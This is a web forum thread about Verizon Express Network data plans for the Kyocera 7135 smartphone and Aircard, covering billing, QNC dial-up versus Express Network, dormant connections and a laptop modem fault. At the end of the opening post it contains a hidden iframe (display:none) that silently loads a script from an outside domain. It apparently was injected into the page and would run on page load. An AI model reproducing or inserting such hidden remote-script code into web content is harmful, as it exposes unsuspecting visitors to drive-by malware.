+ Reply to Thread
Page 1 of 14 1 2 3 4 5 11 ... LastLast

Verizon Express Network?

I have a few questions about Verizons network plans - both data and voice for the 7135. The store clerks could not seem to get a straight answer for this, so I figured someone here has been through this and may be able to help.

First, I just purchased an Aircard 555 (PC Card for data access on a laptop), with the Unlimited Express Network service. No 'voice plan' purchased, data only. However the card lets me dial and connect voice calls - will this be by the minute billing? Is it the same when I am out of an express network area, and have to use QNC?

Next, If I move my 7135 to this same account, would I be able to get Express Network on it as well, or is this another $99/month fee. If not, any suggestions on how to 'bundle' these for the best rate would be appreciated.

Thanks,
    -Ed<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Ed,

One thing you must know. Verizon's store clerks are all IDIOTS!!!

I'm not kidding. I went around and around with them on how I wanted both Express Network and a voice plan on my 7135 and they kept telling me that it couldn't be done. Again I say, IDIOTS!!!

If you've got an Express Network plan you must pay by the minute to use it for voice calls, same goes for QNC because its basically the same thing. That's why I wanted both a voice and an Express Network plan for my 7135.

You also must have a seperate plan for each device on the Express Network, your aircard and 7135 won't be able to share.

What I did was to keep my existing plan (actually, I did upgrade it, but its still an America's Choice Family Plan) and add the Express Network 10MB plan to it for the 7135. I've been having a lot of trouble paying my bills lately because at first I was using QNC and I went WAY over on minutes. Then I switched to ExpNet and still went way over on minutes because I cut down my voice plan to help pay for the ExpNet. That didn't work so I had to bump it back up again. Once things settle down my bills should be about $150 per month, but last month was $400 and the month before that was $300.

Good luck figuring out what you want/need!
    Sorry, but I no longer make 7135 headset adapters.

Originally posted by coolcat
    What I did was to keep my existing plan (actually, I did upgrade it, but its still an America's Choice Family Plan) and add the Express Network 10MB plan to it for the 7135.
    Coolcat - was the EN 10MB plan better than keeping your minutes plan where it was and just adding EN for a flat fee of $30/month? EN would then just go against your minutes, but on nights and weekends would be free. I know this is a tough option to get, but if you speak to the right Verizon rep (I know, it's a reach), they'll be able to add it for you.

Would setting things up as a business account /bundle/share minutes (assuming there is such an animal) help us any?

In the next few weeks I will be adding 2-3 more Aircards on express network unlimited, and probably moving over another 7135.

Just *hoping* to not have a $700 /month bill by the time all is said and done

Thanks for the input guys!
    -Ed

Ok, there seems to be a little confusion here.

First off VZW will be releasing NEW 1x pricing plans in the coming weeks, possibly as early as Monday designed specifically for use with the handheld PDA lineup... ie: Blackberry 6750, Kyo7135, Samsung I-700, and the Thera. They'll be much lower in cost for browsing minutes in 1x. There will also be an Email only package for $5.

Now don't ask specifics because it's not officially out yet.

Here is the internet link to VZW's CURRENT Express Network Plans

http://www.verizonwireless.com/expre...ork/index.html

Here you will get all the info you need on what plan is right for you.

The plans are broken down as such:

Unlimited Data - 1x only. IS95 is per minute charges as well as voice.

Voice/Data Calling plan. Mimics the SingleRate USA calling packages. No promotional minutes allowed (ie Nights/Weekends), but it is voice and data usage either or.

MB -Megabyte pricing - I really don't recommend this unless your SURE about how much your doing.

The $30 add feature which allowed you to use the unlimited nights and weekends on your calling plan is gone. NO longer available.

Now, again all that being said, there will be new plans soon so keep your pants on.

Originally posted by RMSko
    Coolcat - was the EN 10MB plan better than keeping your minutes plan where it was and just adding EN for a flat fee of $30/month? EN would then just go against your minutes, but on nights and weekends would be free. I know this is a tough option to get, but if you speak to the right Verizon rep (I know, it's a reach), they'll be able to add it for you.
    RMSko, I'd never heard of that option before, but it sure would have been nice. According to semm71 it isn't even available anymore though.

I've been patiently (yeah, right) waiting for the new pricing plans. I'm just hoping that they're as good as what Sprint is offering. Right now I'm paying $35/mo. for 10MB. Its hard to ration that out over 30 days, since there's no way to tell or keep track of how much you've used. I really want unlimited because I've got tons of money into what is for now just a toy. With unlimited ExpNet it will become an useful tool.

I am curious about Express Network. When I send an SMS message, the phone doesn't go through the whole QNC dialup to send it. It just puts up a message that it's sending and takes a second or two.

When you are using EN, does it also do this non-dialup connection? For instance, is using the Directory Assistance app over EN just like sending a text message, or does EN do some sort of dialup-handshakewithnetwork-establishconnection deal like QNC does?

(Starting to think about the cheaper rate plans getting ready to come out...)
    ---------------
    The same thing we do every night, Pinky...

Originally posted by BrerLapn
    I am curious about Express Network. When I send an SMS message, the phone doesn't go through the whole QNC dialup to send it. It just puts up a message that it's sending and takes a second or two.

When you are using EN, does it also do this non-dialup connection? For instance, is using the Directory Assistance app over EN just like sending a text message, or does EN do some sort of dialup-handshakewithnetwork-establishconnection deal like QNC does?

(Starting to think about the cheaper rate plans getting ready to come out...)
    EN estabilishes a connection just like QNC does. The difference is that once the connection is established, it can go dorment if you are not sending or receiving data, and you can receive calls in the dorment mode. When you again try to send data, it re-establishes the connection almost instantly from the dormant mode.

VZW's web site says that it will only stay dorment for 5 minutes, but a month or so ago, I heard that they were changing that to two hours, and in general that has been my experience. I sometimes lose it sooner (if I hit a dead spot and lose all cellular service, i defenitly lose it), I have also had an EN connection stay dorment all night and halfway into the next day, but that was during one of ht ecomputer trade shows and I suspect VZW turned off the timeout to make themselves look better (Sprint Vision does not time out in dorment mode).

Note: if you close your flip with an active connection, it will usually disconnect rather then go dorment, but if you let it go dorment first, and then close it, it will maintain it.

Also note: The IR port won't work when you have an active OR dorment network connection. won't give an error, just won't work...

Alan

I could not find an explanation for the codes displayed by the phone for network avaiability. In the top left of my screen in phone mode, it does not say "D" or "R" as promised in the manuel. It says "1X" (I think). Can someone fill me in on the codes. Thanks

Originally posted by thomaskemp
    I could not find an explanation for the codes displayed by the phone for network avaiability. In the top left of my screen in phone mode, it does not say "D" or "R" as promised in the manuel. It says "1X" (I think). Can someone fill me in on the codes. Thanks
    1X means you are in a digital area where Express Network is available. This is new for Verizon activated phones with the latest firmware.

Alan

Alan,

what happens if I'm out of the EN area. Does it automatically switch to QNC or do I have to manually go in and change the script to do QNC instead of EN?

Dagi

Originally posted by Dagi
    Alan,

what happens if I'm out of the EN area. Does it automatically switch to QNC or do I have to manually go in and change the script to do QNC instead of EN?

Dagi
    You will need to manually use the QNC connection. all you need to do is go into network prefs and switch to the QNC item (assuming you have set it up in advance).

Alan

While we're sort of on the subject, is there a single button for disconeccting from the network? I always go into PDA prefs and then Network and shut it down from there. Is there a quicker way?

Thanks

1st: Thanks Alanb for the information.

2nd: on QNC, I just hit the phone button and hang up. I am supposing that this would work for EN too.

3rd: For people who have been on the free QNC and EN: Is EN worth the extra cash? I held off ordering it because I hear there will be a better pricing structure out there in the near future, but it looks like an expensive option right now.

Thanks,

Tom

Regarding closing connections: Most network applications have a Disconnect button somewhere on their menu. Blazer, Eudora Mail, Eudora Web, Snapper, and EIS Web all have Disconnect buttons on the menus. So if you're in an app and you know you're done, you could just close it down from there.

Originally posted by thomaskemp
    1st: Thanks Alanb for the information.

2nd: on QNC, I just hit the phone button and hang up. I am supposing that this would work for EN too.

3rd: For people who have been on the free QNC and EN: Is EN worth the extra cash? I held off ordering it because I hear there will be a better pricing structure out there in the near future, but it looks like an expensive option right now.

Thanks,

Tom
    1st: your welcome.

2nd: It works on EN if your have an active session, but not in a dorment session. Turbocat provdes the answer for how I disconnect from EN, although if I find time in the next couple of weeks, I am going to make a "network disconnnect one click" application and I'll post it to the files section.

3rd: At this price, if I didn't need it for connection my laptop to the network when travelling on business, and if I had to pay out of my own pocket (employer is paying for it....), I probably wouldn't do it. I would just increase the minutes in my voice plan and use QNC. It just doesn't make that big a difference for the applications on the phone, but it makes a HUGE difference when using the phone as a modem.

If the prices do go down as rumored, I may change my tune.

Alan

Originally posted by alanb
    1X means you are in a digital area where Express Network is available. This is new for Verizon activated phones with the latest firmware.

Alan
    Hey, that would be a sweet feature. Do you know if Verizon will update the firmware of my AllTel branded phone yet?

Modem Troubles

I have recently developed a problem with the 7135 acting as a Modem for EN and am hoping someone has an idea.
    Here are the facts: I used the 7135 as a modem with my Dell notebook running W2K for a couple of weeks with no problems. Last week I started having a problem where it would connect to EN, but could not receive data. Everything seems to be working and the two computer icon in the sys tray showed the sending working, but no receiving. Browser and mail both timed out. Just to make sure it was not the 7135, I connected it to my desktop running XP and it worked fine. It also connects to EN fine when I am using the phone browser and e-mail. I have tried deleting the modem and reinstalling it in W2K, but it doesn't help. I tried VZW tech support, but they were stumped.

Any ideas would be most welcome. Right now the one reason I am willing to pay for EN is not working.

Re: Modem Troubles

Originally posted by Lnoble
    I have recently developed a problem with the 7135 acting as a Modem for EN and am hoping someone has an idea.
    Here are the facts: I used the 7135 as a modem with my Dell notebook running W2K for a couple of weeks with no problems. Last week I started having a problem where it would connect to EN, but could not receive data. Everything seems to be working and the two computer icon in the sys tray showed the sending working, but no receiving. Browser and mail both timed out. Just to make sure it was not the 7135, I connected it to my desktop running XP and it worked fine. It also connects to EN fine when I am using the phone browser and e-mail. I have tried deleting the modem and reinstalling it in W2K, but it doesn't help. I tried VZW tech support, but they were stumped.

Any ideas would be most welcome. Right now the one reason I am willing to pay for EN is not working.
    Sent you a PM to see if I can help in person. If we figure it out, we can post the solution, since at least one other user is having a similar issue.

Alan

Re: Re: Modem Troubles

Originally posted by alanb
    Sent you a PM to see if I can help in person. If we figure it out, we can post the solution, since at least one other user is having a similar issue.

Alan
    I welcome the help. I sent you a PM response.

Larry

+ Reply to Thread
Page 1 of 14 1 2 3 4 5 11 ... LastLast